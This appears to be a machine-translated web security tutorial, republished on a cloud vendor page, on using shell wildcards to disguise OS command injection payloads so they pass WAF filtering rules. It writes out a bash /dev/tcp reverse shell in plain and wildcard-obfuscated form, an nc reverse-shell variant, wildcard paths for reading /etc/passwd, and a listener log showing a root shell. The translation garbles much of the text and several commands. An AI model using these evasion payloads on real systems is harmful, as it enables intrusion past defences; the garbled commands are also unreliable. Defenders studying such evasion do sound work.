The fifth chapter of Web security--about using wildcard characters for OS command injection around WAF

Source: Internet
Author: User

First, the introduction of wildcard characters:

In general, the wildcard contains * and?, are English symbols, * used to match any arbitrary character,? to match an arbitrary character.

For example, using wildcards to view files, you can see that the punch-in file is/etc/resolv.conf:

1 sudo Head -5 /??? /R???? V.c?? F 2 # 3 # MacOS Notice 4 # 5 file  for hostname resolution, Address 6 # Resolution, or the DNS query routing mechanism used by most

Similarly, when deleting a file, delete all files that begin with a:

1 RM -F *

Here's a brief explanation of what a wildcard is.

Second, a shell that supports wildcard characters

As can be seen from the above, the Linux, Unix-like operating system command line for parameters or command values are wildcard characters, the name command itself supports wildcards?

1└─[$]>sudo/??? /c?t/??? /R???? V.? O?F2 #3 # MacOS Notice4 #5# thisfileis not consulted forDnshostnameresolution, Address6 # Resolution, or the DNS query routing mechanism used by most7 # Processes on the this system.8 #9 # to-View the DNS configuration used by this system, use:Ten# Scutil--DNS One # A # See ALSO -# DNS-SD (1), Scutil (8) - # the# thisfileis automatically generated. -#

As you can see, the command is partially identified/??? /c?t =/bin/cat

Third, WAF rule set:

The WAF engine-based set of rules for detection and response (release or blocking) of the payload part

For example, payload filtering for OS Command injection:

Rule1 Filter | (%7c) Character & URL encoding%26 even/(%2f) and so on, filter back quotes '

Rule2 filter command keyword and so on

Rule3-a regular expression match

Four, around the WAF

1, found/ETC/PASSWD, will alarm,/??? /P???? D is not, because the matching regular is likely to write the match/[\w]{1,}/[\w]{1,} for Rule3

2. Give a bash simple command to bounce the shell, which is appropriate for Rule2

// normal Bounce shell commands #bash-i >&/dev/tcp/192.168. 1. 102/44440> &1#/??? /b?? H-i >&/dev/tcp/192.168. 1. 102/44440>&1 can be successful 

In testing an example of a direct bounce using NC:

1 #正常情况下: 2 192.168. 1.101 4444 3 4444 -l-v

can be converted into:

1 192.168. 1.101 4444 2 # I have a NL command here/bin, so N can't get out, otherwise you can use n? To replace the NC, and the IP address can be converted to a long integer

Results

 1  [********@***]# nc-p 4444 -L-v  2  ncat:version  6.40  (Http:// nmap.org/ncat)  3  ncat:listening on::: 4444  4  ncat:listening on 0.0 . 0.0 : 4444  5  ncat:connection from ******.  6  ncat:connection from ******:43568   7  whoami  8  Root 

It's done.

In conclusion, this method is still very useful.

The fifth chapter of Web security--about using wildcard characters for OS command injection around WAF

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.